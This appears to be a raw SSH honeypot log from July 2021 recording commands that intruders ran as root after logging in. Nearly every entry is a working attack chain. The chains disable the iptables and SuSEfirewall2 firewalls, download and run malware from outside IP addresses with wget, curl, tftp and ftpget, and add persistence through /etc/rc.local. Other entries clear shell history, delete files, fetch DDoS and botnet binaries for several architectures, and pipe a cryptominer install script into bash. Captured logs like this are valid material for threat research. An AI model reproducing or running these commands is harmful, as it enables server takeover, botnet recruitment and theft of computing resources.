chmod +x mipsel
./mipsel server
Exec wget http://66.42.103.186/hang/armv4l;chmod +x armv4l;./armv4l server;wget http://66.42.103.186/hang/armv5l; chmod +x armv5l;./armv5l server;wget http://66.42.103.186/hang/armv7l;chmod +x armv7l;./armv7l server;wget http://66.42.103.186/hang/mips;chmod +x mips;./mips server;wget http://66.42.103.186/hang/mipsel;chmod +x mipsel;./mipsel server;
wget http://66.42.103.186/hang/armv4l
chmod +x armv4l
./armv4l server
wget http://66.42.103.186/hang/armv5l
chmod +x armv5l
./armv5l server
wget http://66.42.103.186/hang/armv7l
chmod +x armv7l
./armv7l server
wget http://66.42.103.186/hang/mips
chmod +x mips
./mips server
wget http://66.42.103.186/hang/mipsel
chmod +x mipsel
./mipsel server

From 179.43.175.9 14-Jul-2021 10:24:02 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.175.12/cometome; cat cometome > meth; chmod +x meth; chmod 777 *; ./meth; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://179.43.175.12/cometome
cat cometome > meth
chmod +x meth
chmod 777 *
./meth
history -c

From 180.215.192.123 14-Jul-2021 11:58:26 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/VIP;chmod 777 VIP;./VIP;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/VIP
chmod 777 VIP
./VIP

From 209.141.32.204 14-Jul-2021 12:04:59 ssh2 root
Exec cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm -rf ssh*; rm -rf .ssh*; wget 209.141.32.204/ssh || curl -o ssh 209.141.32.204/ssh; tar xvf ssh; cd .ssh; chmod +x *; ./sshd;./krane 1
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm -rf ssh*
rm -rf .ssh*
wget 209.141.32.204/ssh || curl -o ssh 209.141.32.204/ssh
tar xvf ssh
cd .ssh
chmod +x *
./sshd
./krane 1

From 180.215.192.123 15-Jul-2021 02:09:39 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/Linux.server;chmod 777 Linux.server;./Linux.server;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/Linux.server
chmod 777 Linux.server
./Linux.server
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/Linux.server;chmod 777 Linux.server;./Linux.server;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/Linux.server
chmod 777 Linux.server
./Linux.server

From 179.43.176.112 15-Jul-2021 18:41:29 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.175.12/1a9zxq/meth.x86; cat meth.x86 > meth; chmod +x meth; chmod 777 *; ./meth rooted; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://179.43.175.12/1a9zxq/meth.x86
cat meth.x86 > meth
chmod +x meth
chmod 777 *
./meth rooted
history -c

From 180.215.192.123 15-Jul-2021 21:37:15 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/Linux2.4;chmod 777 Linux2.4;./Linux2.4;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/Linux2.4
chmod 777 Linux2.4
./Linux2.4
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/Linux2.4;chmod 777 Linux2.4;./Linux2.4;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/Linux2.4
chmod 777 Linux2.4
./Linux2.4
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 107.189.3.205 15-Jul-2021 21:49:16 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec uname -a
uname -a

From 180.215.192.107 16-Jul-2021 00:05:28 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/KDLinux;chmod 777 KDLinux;./KDLinux;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/KDLinux
chmod 777 KDLinux
./KDLinux
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/KDLinux;chmod 777 KDLinux;./KDLinux;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/KDLinux
chmod 777 KDLinux
./KDLinux

From 180.215.192.107 16-Jul-2021 00:25:23 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/DDos;chmod 777 DDos;./DDos;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/DDos
chmod 777 DDos
./DDos
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/DDos;chmod 777 DDos;./DDos;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/DDos
chmod 777 DDos
./DDos

From 180.215.192.123 16-Jul-2021 03:24:40 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/99.6;chmod 777 99.6;./99.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/99.6
chmod 777 99.6
./99.6
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/99.6;chmod 777 99.6;./99.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/99.6
chmod 777 99.6
./99.6

From 180.215.192.123 16-Jul-2021 11:52:04 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/qq;chmod 777 qq;./qq;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/qq
chmod 777 qq
./qq

From 180.215.192.123 16-Jul-2021 12:00:16 ssh2 root
Exec  /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/qq;chmod 777 qq;./qq;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/qq
chmod 777 qq
./qq
Exec  /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/qq;chmod 777 qq;./qq;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/qq
chmod 777 qq
./qq

From 180.215.192.107 16-Jul-2021 23:58:58 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/M;chmod 777 M;./M;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/M
chmod 777 M
./M

From 180.215.192.107 17-Jul-2021 00:10:51 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/Q;chmod 777 Q;./Q;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/Q
chmod 777 Q
./Q
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/Q;chmod 777 Q;./Q;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/Q
chmod 777 Q
./Q

From 180.215.192.107 17-Jul-2021 00:18:43 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/L;chmod 777 L;./L;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/L
chmod 777 L
./L
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/L;chmod 777 L;./L;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/L
chmod 777 L
./L

From 180.215.192.107 17-Jul-2021 00:33:55 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/E;chmod 777 E;./E;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/E
chmod 777 E
./E

From 209.141.53.60 17-Jul-2021 01:41:16 ssh2 root
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 222.186.133.167 17-Jul-2021 07:14:01 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.167:8181/wsnd;chmod 777 wsnd;./wsnd;echo "cd /tmp/">>/etc/rc.local;echo "./wsnd&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.167:8181/wsnd
chmod 777 wsnd
./wsnd
echo "cd /tmp/">>/etc/rc.local
echo "./wsnd
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 121.4.243.18 18-Jul-2021 17:32:38 ssh2 root
Exec echo -n bSkjDm2w|md5sum
echo -n bSkjDm2w|md5sum

From 117.24.13.169 19-Jul-2021 06:24:35 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://1.117.4.172:999/fgh;chmod 777 fgh;./fgh;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://1.117.4.172:999/fgh
chmod 777 fgh
./fgh
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://1.117.4.172:999/fgh;chmod 777 fgh;./fgh;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://1.117.4.172:999/fgh
chmod 777 fgh
./fgh

From 117.24.13.169 19-Jul-2021 07:32:50 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://1.117.4.172:999/aaa;chmod 777 aaa;./aaa;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://1.117.4.172:999/aaa
chmod 777 aaa
./aaa

From 117.24.13.169 19-Jul-2021 09:08:10 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://1.117.4.172:999/txma;chmod 777 txma;./txma
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://1.117.4.172:999/txma
chmod 777 txma
./txma

From 117.24.13.169 19-Jul-2021 09:29:50 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://1.117.4.172:999/txma;chmod 777 txma;./txma;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://1.117.4.172:999/txma
chmod 777 txma
./txma
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://1.117.4.172:999/txma;chmod 777 txma;./txma;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://1.117.4.172:999/txma
chmod 777 txma
./txma

From 117.24.13.169 19-Jul-2021 10:36:31 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;rm -f txma;wget http://1.117.4.172:999/txma;chmod 777 txma;./txma
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
rm -f txma
wget http://1.117.4.172:999/txma
chmod 777 txma
./txma

From 117.24.13.169 19-Jul-2021 10:38:41 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;rm -f txma;wget http://1.117.4.172:999/txma;chmod 777 txma;./txma
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
rm -f txma
wget http://1.117.4.172:999/txma
chmod 777 txma
./txma
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;rm -f txma;wget http://1.117.4.172:999/txma;chmod 777 txma;./txma
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
rm -f txma
wget http://1.117.4.172:999/txma
chmod 777 txma
./txma

From 117.24.13.169 19-Jul-2021 10:44:40 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;rm -f txma;wget http://1.117.4.172:999/txma666;chmod 777 txma666;./txma666
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
rm -f txma
wget http://1.117.4.172:999/txma666
chmod 777 txma666
./txma666
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;rm -f txma;wget http://1.117.4.172:999/txma666;chmod 777 txma666;./txma666
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
rm -f txma
wget http://1.117.4.172:999/txma666
chmod 777 txma666
./txma666

From 199.19.226.145 20-Jul-2021 07:55:04 ssh2 root
Exec cd /tmp; wget http://152.89.239.4/x86_64; chmod 777 *; ./x86_64 x86_wget; curl -O http://152.89.239.4/x86_64; chmod 777 *; ./x86_64 x86_curl
cd /tmp
wget http://152.89.239.4/x86_64
chmod 777 *
./x86_64 x86_wget
curl -O http://152.89.239.4/x86_64
chmod 777 *
./x86_64 x86_curl

From 179.43.176.112 21-Jul-2021 01:03:32 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.175.12/1a9zxq/meth.x86; cat meth.x86 > meth; chmod +x meth; chmod 777 *; ./meth rooted; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://179.43.175.12/1a9zxq/meth.x86
cat meth.x86 > meth
chmod +x meth
chmod 777 *
./meth rooted
history -c

From 180.215.192.107 21-Jul-2021 02:46:15 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/C;chmod 777 C;./C;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/C
chmod 777 C
./C

From 180.215.192.107 21-Jul-2021 02:51:21 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/C;chmod 777 C;./C;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/C
chmod 777 C
./C
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/C;chmod 777 C;./C;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/C
chmod 777 C
./C

From 180.215.192.107 21-Jul-2021 02:57:55 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/ee;chmod 777 ee;./ee;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/ee
chmod 777 ee
./ee

From 209.141.53.60 21-Jul-2021 13:00:18 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 203.159.80.131 22-Jul-2021 13:51:44 ssh2 root
Exec uname -a
uname -a
Exec uname -a
uname -a
Exec uname -a
uname -a
Exec uname -a
uname -a

From 180.215.192.107 22-Jul-2021 23:20:30 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.124.34.136/VIP;chmod 777 VIP;./VIP;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.124.34.136/VIP
chmod 777 VIP
./VIP

From 222.186.133.167 23-Jul-2021 03:44:23 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.167:8181/wsnd;chmod 777 wsnd;./wsnd;echo "cd /tmp/">>/etc/rc.local;echo "./wsnd&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.167:8181/wsnd
chmod 777 wsnd
./wsnd
echo "cd /tmp/">>/etc/rc.local
echo "./wsnd
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.167:8181/wsnd;chmod 777 wsnd;./wsnd;echo "cd /tmp/">>/etc/rc.local;echo "./wsnd&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.167:8181/wsnd
chmod 777 wsnd
./wsnd
echo "cd /tmp/">>/etc/rc.local
echo "./wsnd
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 138.68.79.242 25-Jul-2021 11:25:22 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://167.172.111.114/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 167.172.111.114 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 167.172.111.114; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://167.172.111.114/yoyobins.sh
chmod 777 yoyobins.sh
sh yoyobins.sh
tftp 167.172.111.114 -c get yoyotftp1.sh
chmod 777 yoyotftp1.sh
sh yoyotftp1.sh
tftp -r yoyotftp2.sh -g 167.172.111.114
chmod 777 yoyotftp2.sh
sh yoyotftp2.sh
rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh
rm -rf *

From 209.141.56.41 26-Jul-2021 11:44:00 ssh2 root
Exec cat /etc/issue; apt update -y; yum update -y; apt install curl -y; yum install curl -y; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 45PhrYw8ktzFEEXgfyuQDcEVQNeQQ9ANQ7xB6eUzXJ3D6QqK7TeBTh5AdqxRGZpUtqFLayFiirg8Nj9djgKaMMAVE48GAWX; echo Gonna get ripped Hraztalag was here lel
cat /etc/issue
apt update -y
yum update -y
apt install curl -y
yum install curl -y
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 45PhrYw8ktzFEEXgfyuQDcEVQNeQQ9ANQ7xB6eUzXJ3D6QqK7TeBTh5AdqxRGZpUtqFLayFiirg8Nj9djgKaMMAVE48GAWX
echo Gonna get ripped Hraztalag was here lel

From 222.186.133.167 28-Jul-2021 02:11:09 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.167:8181/wsnbb;chmod 777 wsnbb;./wsnbb;echo "cd /tmp/">>/etc/rc.local;echo "./wsnbb&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.167:8181/wsnbb
chmod 777 wsnbb
./wsnbb
echo "cd /tmp/">>/etc/rc.local
echo "./wsnbb
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 209.141.56.41 29-Jul-2021 02:01:20 ssh2 root
Exec cat /etc/issue; apt update -y; yum update -y; apt install curl -y; yum install curl -y; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s; echo Gonna get ripped Hraztalag was here lel
cat /etc/issue
apt update -y
yum update -y
apt install curl -y
yum install curl -y
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
echo Gonna get ripped Hraztalag was here lel

From 199.19.226.145 29-Jul-2021 06:55:54 ssh2 root
Exec cd /tmp; wget http://152.89.239.4/x86_64; chmod 777 *; ./x86_64 x86_wget; curl -O http://152.89.239.4/x86_64; chmod 777 *; ./x86_64 x86_curl
cd /tmp
wget http://152.89.239.4/x86_64
chmod 777 *
./x86_64 x86_wget
curl -O http://152.89.239.4/x86_64
chmod 777 *
./x86_64 x86_curl

From 209.141.36.53 29-Jul-2021 16:11:15 ssh2 root
Exec cat /etc/issue; apt update -y; yum update -y; apt install curl -y; yum install curl -y; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
cat /etc/issue
apt update -y
yum update -y
apt install curl -y
yum install curl -y
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
echo Gonna get ripped Hraztalag was here lel

From 164.90.165.44 30-Jul-2021 05:21:34 ssh2 root
Exec uname -s -v -n -r
uname -s -v -n -r

From 180.215.194.46 31-Jul-2021 09:02:23 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.194.46:8080/xudp;chmod 777 xudp;./xudp;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.194.46:8080/xudp
chmod 777 xudp
./xudp
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.194.46:8080/xudp;chmod 777 xudp;./xudp;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.194.46:8080/xudp
chmod 777 xudp
./xudp

From 180.215.194.46 31-Jul-2021 09:15:32 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.194.46:8080/txma;chmod 777 txma;./txma;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.194.46:8080/txma
chmod 777 txma
./txma

From 180.215.194.46 31-Jul-2021 09:41:24 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.194.46:8080/dos64;chmod 777 dos64;./dos64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.194.46:8080/dos64
chmod 777 dos64
./dos64
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.194.46:8080/dos64;chmod 777 dos64;./dos64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.194.46:8080/dos64
chmod 777 dos64
./dos64

From 180.215.194.46 31-Jul-2021 09:49:40 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.194.46:8080/dos32;chmod 777 dos32;./dos32;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.194.46:8080/dos32
chmod 777 dos32
./dos32
